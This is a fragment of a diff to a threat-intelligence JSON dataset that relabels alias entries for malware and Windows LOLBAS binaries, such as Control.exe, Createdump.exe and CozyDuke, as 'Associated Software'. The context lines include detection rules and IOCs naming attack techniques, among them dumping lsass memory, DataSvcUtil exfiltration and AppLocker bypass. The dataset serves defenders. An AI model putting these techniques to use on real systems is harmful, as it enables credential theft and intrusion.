2021](https://app.tidalcyber.com/references/16b4b834-2f44-4bac-b810-f92080c41f09)]", @@ -5837,7 +5837,7 @@ } ], "uuid": "94e2981f-681e-4bb8-bcef-98f8ed60f4ed", - "value": "Control.exe" + "value": "Control.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary used to launch controlpanel items in Windows\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\control.exe\n* C:\\Windows\\SysWOW64\\control.exe\n\n**Resources:**\n* [https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/](https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/)\n* [https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/](https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/)\n* [https://twitter.com/bohops/status/955659561008017409](https://twitter.com/bohops/status/955659561008017409)\n* [https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items](https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items)\n* [https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/](https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/)\n\n**Detection:**\n* Sigma: [proc_creation_win_exploit_cve_2021_40444.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml)\n* Sigma: [proc_creation_win_rundll32_susp_control_dll_load.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)\n* Elastic: [defense_evasion_execution_control_panel_suspicious_args.toml](https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml)\n* Elastic: [defense_evasion_unusual_dir_ads.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml)\n* IOC: Control.exe executing files from alternate data streams\n* IOC: Control.exe executing library file without cpl extension\n* IOC: Suspicious network connections from control.exe[[Control.exe - LOLBAS Project](/references/d0c821b9-7d37-4158-89fa-0dabe6e06800)]", @@ -5929,7 +5929,7 @@ } ], "uuid": "462f4c43-12e3-4901-b741-72e8c6e6e98a", - "value": "coregen.exe" + "value": "coregen.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads exported function GetCLRRuntimeHost from coreclr.dll or from .DLL in arbitrary path. Coregen is located within \"C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\\" or another version of Silverlight. Coregen is signed by Microsoft and bundled with Microsoft Silverlight.\n\n**Author:** Martin Sohn Christensen\n\n**Paths:**\n* C:\\Program Files\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe\n* C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe\n\n**Resources:**\n* [https://www.youtube.com/watch?v=75XImxOOInU](https://www.youtube.com/watch?v=75XImxOOInU)\n* [https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html](https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html)\n\n**Detection:**\n* Sigma: [image_load_side_load_coregen.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/image_load/image_load_side_load_coregen.yml)\n* IOC: coregen.exe loading .dll file not in \"C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\\"\n* IOC: coregen.exe loading .dll file not named coreclr.dll\n* IOC: coregen.exe command line containing -L or -l\n* IOC: coregen.exe command line containing unexpected/invald assembly name\n* IOC: coregen.exe application crash by invalid assembly name[[coregen.exe - LOLBAS Project](/references/f24d4cf5-9ca9-46bd-bd43-86b37e2a638a)]", @@ -5970,7 +5970,7 @@ } ], "uuid": "8af3037f-732c-433e-8689-701593604bae", - "value": "Sofacy" + "value": "Sofacy - Associated Software" }, { "description": "[[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)] [[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)][[Securelist Sofacy Feb 2018](https://app.tidalcyber.com/references/3a043bba-2451-4765-946b-c1f3bf4aea36)]", @@ -5984,7 +5984,7 @@ } ], "uuid": "36d5d0ca-1bfc-45b1-ac54-2da2e1b2a5c7", - "value": "SOURFACE" + "value": "SOURFACE - Associated Software" }, { "description": "[CORESHELL](https://app.tidalcyber.com/software/3b193f62-2b49-4eff-bdf4-501fb8a28274) is a downloader used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5). The older versions of this malware are known as SOURFACE and newer versions as CORESHELL.[[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)] [[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]", @@ -6034,7 +6034,7 @@ } ], "uuid": "b46da8df-d944-4bf0-b715-dad7dbc6d658", - "value": "TinyBaron" + "value": "TinyBaron - Associated Software" }, { "description": "", @@ -6048,7 +6048,7 @@ } ], "uuid": "f5f9ef72-8f34-47d6-a767-86b3b07ce00e", - "value": "BotgenStudios" + "value": "BotgenStudios - Associated Software" }, { "description": "", @@ -6062,7 +6062,7 @@ } ], "uuid": "d7724aad-70a0-40a8-ad43-a92bedb8f8fd", - "value": "NemesisGemina" + "value": "NemesisGemina - Associated Software" }, { "description": "[CosmicDuke](https://app.tidalcyber.com/software/43b317c6-5b4f-47b8-b7b4-15cd6f455091) is malware that was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) from 2010 to 2015. [[F-Secure The Dukes](https://app.tidalcyber.com/references/cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27)]", @@ -6137,7 +6137,7 @@ } ], "uuid": "58e77779-2cc6-4570-95a7-fb59b089ab28", - "value": "CozyDuke" + "value": "CozyDuke - Associated Software" }, { "description": "", @@ -6151,7 +6151,7 @@ } ], "uuid": "49b8f0f4-77aa-4c7e-925d-054102c7178b", - "value": "CozyBear" + "value": "CozyBear - Associated Software" }, { "description": "", @@ -6165,7 +6165,7 @@ } ], "uuid": "60187172-ade3-4d87-8d51-3b064838867d", - "value": "Cozer" + "value": "Cozer - Associated Software" }, { "description": "", @@ -6179,7 +6179,7 @@ } ], "uuid": "8b01f729-fa16-4bd7-b5d3-2d84a1ecb32b", - "value": "EuroAPT" + "value": "EuroAPT - Associated Software" }, { "description": "[CozyCar](https://app.tidalcyber.com/software/c2353daa-fd4c-44e1-8013-55400439965a) is malware that was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) from 2010 to 2015. It is a modular malware platform, and its backdoor component can be instructed to download and execute a variety of modules with different functionality. [[F-Secure The Dukes](https://app.tidalcyber.com/references/cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27)]", @@ -6279,7 +6279,7 @@ } ], "uuid": "8a49e7dc-04ce-44d3-919d-91700e11e1c9", - "value": "Createdump.exe" + "value": "Createdump.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft .NET Runtime Crash Dump Generator (included in .NET Core)\n\n**Author:** mr.d0x, Daniel Santos\n\n**Paths:**\n* C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\*\\createdump.exe\n* C:\\Program Files (x86)\\dotnet\\shared\\Microsoft.NETCore.App\\*\\createdump.exe\n* C:\\Program Files\\Microsoft Visual Studio\\*\\Community\\dotnet\\runtime\\shared\\Microsoft.NETCore.App\\6.0.0\\createdump.exe\n* C:\\Program Files (x86)\\Microsoft Visual Studio\\*\\Community\\dotnet\\runtime\\shared\\Microsoft.NETCore.App\\6.0.0\\createdump.exe\n\n**Resources:**\n* [https://twitter.com/bopin2020/status/1366400799199272960](https://twitter.com/bopin2020/status/1366400799199272960)\n* [https://docs.microsoft.com/en-us/troubleshoot/developer/webapps/aspnetcore/practice-troubleshoot-linux/lab-1-3-capture-core-crash-dumps](https://docs.microsoft.com/en-us/troubleshoot/developer/webapps/aspnetcore/practice-troubleshoot-linux/lab-1-3-capture-core-crash-dumps)\n\n**Detection:**\n* Sigma: [proc_creation_win_proc_dump_createdump.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml)\n* Sigma: [proc_creation_win_renamed_createdump.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_renamed_createdump.yml)\n* IOC: createdump.exe process with a command line containing the lsass.exe process id[[Createdump.exe - LOLBAS Project](/references/f3ccacc1-3b42-4042-9a5c-f5b483a5e801)]", @@ -6397,7 +6397,7 @@ } ], "uuid": "349d3f77-068f-4300-98b9-05245f5f3a7a", - "value": "MSIL/Crimson" + "value": "MSIL/Crimson - Associated Software" }, { "description": "[Crimson](https://app.tidalcyber.com/software/3b3f296f-20a6-459a-98c5-62ebdee3701f) is a remote access Trojan that has been used by [Transparent Tribe](https://app.tidalcyber.com/groups/441b91d1-256a-4763-bac6-8f1c76764a25) since at least 2016.[[Proofpoint Operation Transparent Tribe March 2016](https://app.tidalcyber.com/references/8e39d0da-114f-4ae6-8130-ca1380077d6a)][[Kaspersky Transparent Tribe August 2020](https://app.tidalcyber.com/references/42c7faa2-f664-4e4a-9d23-93c88a09da5b)]", @@ -6522,7 +6522,7 @@ } ], "uuid": "909a545e-eec1-4c0d-a57e-a183bf036bb6", - "value": "Csc.exe" + "value": "Csc.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary file used by .NET to compile C# code\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Csc.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Csc.exe\n\n**Resources:**\n* [https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe](https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe)\n\n**Detection:**\n* Sigma: [proc_creation_win_csc_susp_parent.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml)\n* Sigma: [proc_creation_win_csc_susp_folder.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_folder.yml)\n* Elastic: [defense_evasion_dotnet_compiler_parent_process.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml)\n* Elastic: [defense_evasion_execution_msbuild_started_unusal_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml)\n* IOC: Csc.exe should normally not run as System account unless it is used for development.[[Csc.exe - LOLBAS Project](/references/276c9e55-4673-426d-8f49-06edee2e3b30)]", @@ -6569,7 +6569,7 @@ } ], "uuid": "589c7b11-190b-4cd3-b8c4-cf623697d207", - "value": "Cscript.exe" + "value": "Cscript.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary used to execute scripts in Windows\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\cscript.exe\n* C:\\Windows\\SysWOW64\\cscript.exe\n\n**Resources:**\n* [https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)\n* [https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/](https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/)\n\n**Detection:**\n* Sigma: [proc_creation_win_wscript_cscript_script_exec.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml)\n* Sigma: [file_event_win_net_cli_artefact.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml)\n* Elastic: [defense_evasion_unusual_dir_ads.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml)\n* Elastic: [command_and_control_remote_file_copy_scripts.toml](https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml)\n* Elastic: [defense_evasion_suspicious_managedcode_host_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml)\n* Splunk: [wscript_or_cscript_suspicious_child_process.yml](https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* IOC: Cscript.exe executing files from alternate data streams\n* IOC: DotNet CLR libraries loaded into cscript.exe\n* IOC: DotNet CLR Usage Log - cscript.exe.log[[Cscript.exe - LOLBAS Project](/references/428b6223-63b7-497f-b13a-e472b4583a9f)]", @@ -6612,7 +6612,7 @@ } ], "uuid": "bebeee27-af58-4daa-ae34-c432ba0aaf0d", - "value": "csi.exe" + "value": "csi.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Command line interface included with Visual Studio.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* c:\\Program Files (x86)\\Microsoft Visual Studio\\2017\\Community\\MSBuild\\15.0\\Bin\\Roslyn\\csi.exe\n* c:\\Program Files (x86)\\Microsoft Web Tools\\Packages\\Microsoft.Net.Compilers.X.Y.Z\\tools\\csi.exe\n\n**Resources:**\n* [https://twitter.com/subTee/status/781208810723549188](https://twitter.com/subTee/status/781208810723549188)\n* [https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/](https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/)\n\n**Detection:**\n* Sigma: [proc_creation_win_csi_execution.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml)\n* Sigma: [proc_creation_win_csi_use_of_csharp_console.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_csi_use_of_csharp_console.yml)\n* Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)[[csi.exe - LOLBAS Project](/references/b810ee91-de4e-4c7b-8fa8-24dca95133e5)]", @@ -6714,7 +6714,7 @@ } ], "uuid": "642284c2-5216-47f6-994b-98ff2fa839b9", - "value": "CustomShellHost.exe" + "value": "CustomShellHost.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** A host process that is used by custom shells when using Windows in Kiosk mode.\n\n**Author:** Wietze Beukema\n\n**Paths:**\n* C:\\Windows\\System32\\CustomShellHost.exe\n\n**Resources:**\n* [https://twitter.com/YoSignals/status/1381353520088113154](https://twitter.com/YoSignals/status/1381353520088113154)\n* [https://docs.microsoft.com/en-us/windows/configuration/kiosk-shelllauncher](https://docs.microsoft.com/en-us/windows/configuration/kiosk-shelllauncher)\n\n**Detection:**\n* IOC: CustomShellHost.exe is unlikely to run on normal workstations\n* Sigma: [proc_creation_win_lolbin_customshellhost.yml](https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml)[[CustomShellHost.exe - LOLBAS Project](/references/96324ab1-7eb8-42dc-b19a-fa1d9f85e239)]", @@ -6839,7 +6839,7 @@ } ], "uuid": "cc96486b-d19d-4819-8265-9203a28ba6c9", - "value": "Krademok" + "value": "Krademok - Associated Software" }, { "description": "[[TrendMicro DarkComet Sept 2014](https://app.tidalcyber.com/references/fb365600-4961-43ed-8292-1c07cbc530ef)]", @@ -6853,7 +6853,7 @@ } ], "uuid": "afb90bbd-2299-4f3a-a9a8-792f4401e08f", - "value": "DarkKomet" + "value": "DarkKomet - Associated Software" }, { "description": "[[TrendMicro DarkComet Sept 2014](https://app.tidalcyber.com/references/fb365600-4961-43ed-8292-1c07cbc530ef)]", @@ -6867,7 +6867,7 @@ } ], "uuid": "f319bc98-ef43-47ef-8572-601f0be6fb68", - "value": "Fynloski" + "value": "Fynloski - Associated Software" }, { "description": "[[TrendMicro DarkComet Sept 2014](https://app.tidalcyber.com/references/fb365600-4961-43ed-8292-1c07cbc530ef)]", @@ -6881,7 +6881,7 @@ } ], "uuid": "abbedb20-272b-4278-ab46-8e46e7cd70ed", - "value": "FYNLOS" + "value": "FYNLOS - Associated Software" }, { "description": "[DarkComet](https://app.tidalcyber.com/software/74f88899-56d0-4de8-97de-539b3590ab90) is a Windows remote administration tool and backdoor.[[TrendMicro DarkComet Sept 2014](https://app.tidalcyber.com/references/fb365600-4961-43ed-8292-1c07cbc530ef)][[Malwarebytes DarkComet March 2018](https://app.tidalcyber.com/references/6a765a99-8d9f-4076-8741-6415a5ab918b)]", @@ -7017,7 +7017,7 @@ } ], "uuid": "dae98258-e7d1-4e13-9c88-13d5fe07bf89", - "value": "Nioupale" + "value": "Nioupale - Associated Software" }, { "description": "[[Trend Micro Daserf Nov 2017](https://app.tidalcyber.com/references/4ca0e6a9-8c20-49a0-957a-7108083a8a29)]", @@ -7031,7 +7031,7 @@ } ], "uuid": "82694e7e-140d-4ee6-93a0-03af069029cf", - "value": "Muirim" + "value": "Muirim - Associated Software" }, { "description": "[Daserf](https://app.tidalcyber.com/software/fad65026-57c4-4d4f-8803-87178dd4b887) is a backdoor that has been used to spy on and steal from Japanese, South Korean, Russian, Singaporean, and Chinese victims. Researchers have identified versions written in both Visual C and Delphi. [[Trend Micro Daserf Nov 2017](https://app.tidalcyber.com/references/4ca0e6a9-8c20-49a0-957a-7108083a8a29)] [[Secureworks BRONZE BUTLER Oct 2017](https://app.tidalcyber.com/references/c62d8d1a-cd1b-4b39-95b6-68f3f063dacf)]", @@ -7080,7 +7080,7 @@ } ], "uuid": "c64f5d2e-d645-4dd8-bc8f-9e515f8f80c3", - "value": "DataSvcUtil.exe" + "value": "DataSvcUtil.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.\n\n**Author:** Ialle Teixeira\n\n**Paths:**\n* C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\DataSvcUtil.exe\n\n**Resources:**\n* [https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe](https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe)\n* [https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services](https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services)\n* [https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services](https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml)\n* IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory.\n* IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS.\n* IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil.[[DataSvcUtil.exe - LOLBAS Project](/references/0c373780-3202-4036-8c83-f3d468155b35)]", @@ -7172,7 +7172,7 @@ } ], "uuid": "a5895370-3911-4fd5-a61d-5e7cdf4eaa7b", - "value": "DEADEYE.EMBED" + "value": "DEADEYE.EMBED - Associated Software" }, { "description": "[[Mandiant APT41](https://app.tidalcyber.com/references/e54415fe-40c2-55ff-9e75-881bc8a912b8)]", @@ -7186,7 +7186,7 @@ } ], "uuid": "f55765f5-c5b6-4b6d-a50d-f96793569149", - "value": "DEADEYE.APPEND" + "value": "DEADEYE.APPEND - Associated Software" }, { "description": "[DEADEYE](https://app.tidalcyber.com/software/e9533664-90c5-5b40-a40e-a69a2eda8bc9) is a malware launcher that has been used by [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) since at least May 2021. [DEADEYE](https://app.tidalcyber.com/software/e9533664-90c5-5b40-a40e-a69a2eda8bc9) has variants that can either embed a payload inside a compiled binary (DEADEYE.EMBED) or append it to the end of a file (DEADEYE.APPEND).[[Mandiant APT41](https://app.tidalcyber.com/references/e54415fe-40c2-55ff-9e75-881bc8a912b8)]", @@ -7287,7 +7287,7 @@ } ], "uuid": "95c59305-52c1-4d55-a9cd-8ce48e7a3a30", - "value": "DefaultPack.EXE" + "value": "DefaultPack.EXE - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** This binary can be downloaded along side multiple software downloads on the microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider.\n\n**Author:** @checkymander\n\n**Paths:**\n* C:\\Program Files (x86)\\Microsoft\\DefaultPack\\\n\n**Resources:**\n* [https://twitter.com/checkymander/status/1311509470275604480.](https://twitter.com/checkymander/status/1311509470275604480.)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_defaultpack.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_defaultpack.yml)\n* IOC: DefaultPack.EXE spawned an unknown process[[DefaultPack.EXE - LOLBAS Project](/references/106efc3e-5816-44ae-a384-5e026e68ab89)]", @@ -7388,7 +7388,7 @@ } ], "uuid": "92b622fe-1002-49f7-87ca-e97046f6ed40", - "value": "PHOTO" + "value": "PHOTO - Associated Software" }, { "description": "[Derusbi](https://app.tidalcyber.com/software/9222aa77-922e-43c7-89ad-71067c428fb2) is malware used by multiple Chinese APT groups.[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)][[ThreatConnect Anthem](https://app.tidalcyber.com/references/61ecd0b4-6cac-4d9f-8e8c-3d488fef6fec)] Both Windows and Linux variants have been observed.[[Fidelis Turbo](https://app.tidalcyber.com/references/f19877f1-3e0f-4c68-b6c9-ef5b0bd470ed)]", @@ -7449,7 +7449,7 @@ } ], "uuid": "670ed300-364b-45ad-ad7f-732d13365571", - "value": "Desk.cpl" + "value": "Desk.cpl - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Desktop Settings Control Panel\n\n**Author:** Hai Vaknin\n\n**Paths:**\n* C:\\Windows\\System32\\desk.cpl\n* C:\\Windows\\SysWOW64\\desk.cpl\n\n**Resources:**\n* [https://vxug.fakedoma.in/zines/29a/29a7/Articles/29A-7.030.txt](https://vxug.fakedoma.in/zines/29a/29a7/Articles/29A-7.030.txt)\n* [https://twitter.com/pabraeken/status/998627081360695297](https://twitter.com/pabraeken/status/998627081360695297)\n* [https://twitter.com/VakninHai/status/1517027824984547329](https://twitter.com/VakninHai/status/1517027824984547329)\n* [https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files](https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files)\n\n**Detection:**\n* Sigma: [file_event_win_new_src_file.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_new_src_file.yml)\n* Sigma: [proc_creation_win_lolbin_rundll32_installscreensaver.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml)\n* Sigma: [registry_set_scr_file_executed_by_rundll32.yml](https://github.com/SigmaHQ/sigma/blob/940f89d43dbac5b7108610a5bde47cda0d2a643b/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml)[[Desk.cpl - LOLBAS Project](/references/487a54d9-9f90-478e-b305-bd041af55e12)]", @@ -7492,7 +7492,7 @@ } ], "uuid": "75e0d2df-7f93-4b5a-b085-4d2dfdac1348", - "value": "Desktopimgdownldr.exe" + "value": "Desktopimgdownldr.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows binary used to configure lockscreen/desktop image\n\n**Author:** Gal Kristal\n\n**Paths:**\n* c:\\windows\\system32\\desktopimgdownldr.exe\n\n**Resources:**\n* [https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/](https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/)\n\n**Detection:**\n* Sigma: [proc_creation_win_desktopimgdownldr_susp_execution.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml)\n* Sigma: 